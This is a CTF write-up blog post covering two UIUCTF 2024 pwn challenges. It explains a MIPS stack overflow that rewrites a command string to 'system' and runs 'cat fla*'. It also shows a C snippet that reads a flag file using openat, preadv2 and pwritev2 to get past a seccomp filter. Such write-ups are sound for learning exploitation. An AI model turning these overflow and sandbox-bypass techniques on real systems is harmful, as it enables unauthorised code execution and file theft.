[PWN - Writeup] Syscalls and Backup Power from UIUCTF 2024
( بِسْمِ اللَّـهِ الرَّحْمَـٰنِ الرَّحِيمِ )
(إن أحسنت فمن الله، وإن أسأت فمن نفسي والشيطان)
Let's solve Backup Power & Syscalls (pwn).
Table of Content
- Backup Power (pwn - 454)
- Syscalls (pwn - 398)
Backup Power (pwn - 454)
This was a MIPS chall (i like mips), let's start with reversing the binary.
start with the security of controls on the application
what the binary takes from us
now let's reverse the binary, we have commands and just the allowed commands [shutup, shutdown] and the system is not in the allowed list.
if we used "devolper" is the username we will take a branch that will call function "develper_power_managemnet_portal"
this function is vulnerable to stack overflow it gets input without validation of the size but we have to take care of the stack we have to make "vars20" equal to "cfi" we will not do the canary check (i think).
there is a default command "todo" that will be compared with the commands
after all of that I though that I had to add "system" to the allowed list and then use it, but for some reason, it did not work with me (maybe I did something wrong) but I used another way.
i did a breakpoint on the "strcmp"
so I tried to overflow the "todo" command at "0x40800430" to be "system" After that i found there was a call to system, our buffer started at "0x40800308".
When i tried to fill the padding between my buffer and the address to "todo" command i faced a crash
I overwrote an address that is used in the "$gp" register, i added a breakpoint on this address run the program normally again took the right address from it "0x004aa330" and just filled the padding with it
replacing "todo" with "system" will make the check like that
and we will see that
these "A"s form our buffer so we have to add a command to read the flag and i just have 8 bytes and should be separated "4" + "4" and we know that the flag called "flag.txt" so i used the following payload "cat " and "fla*".
this is my final stack values
and we got the flag ;-).
the solution script here.
Syscalls (pwn - 398)
hint form the name it replated to some syscall jail xD.
first running "seccomp-tool" to know the forbidden syscalls
reversing the binary show that it's simple just take input from you and execute it after making sure that there is no forbidden syscalls.
after searching on ther syscalls table found some useful syscalls [openat, preadv2, pwritev2] and i tried it first in a simple C code
#define _GNU_SOURCE
#include <fcntl.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/uio.h>
int main() {
const char *filename = "flag.txt";
int fd = openat(-100, filename, 0);
char *buffer[4096];
struct iovec iov[1];
iov[0].iov_base = buffer;
iov[0].iov_len = sizeof(buffer);
ssize_t bytes_read = preadv2(fd, iov, 1, 1, 0);
ssize_t bytes_written = pwritev2(1, iov, 1, 0, 0);
return 0;
}
first i tried it but no flag printed in local test and the issue was in "pwritev2" it said that the fd is not seacable the stdout one, a friend helps me with this one after checking the man page there is comment "if the offset argument is -1, then the current file offset is used and updated" donno waht the hack this mean but when i tried it the magic happen and the issue fixed locally.
now we have to send the assembly to do the same
Comments
Post a Comment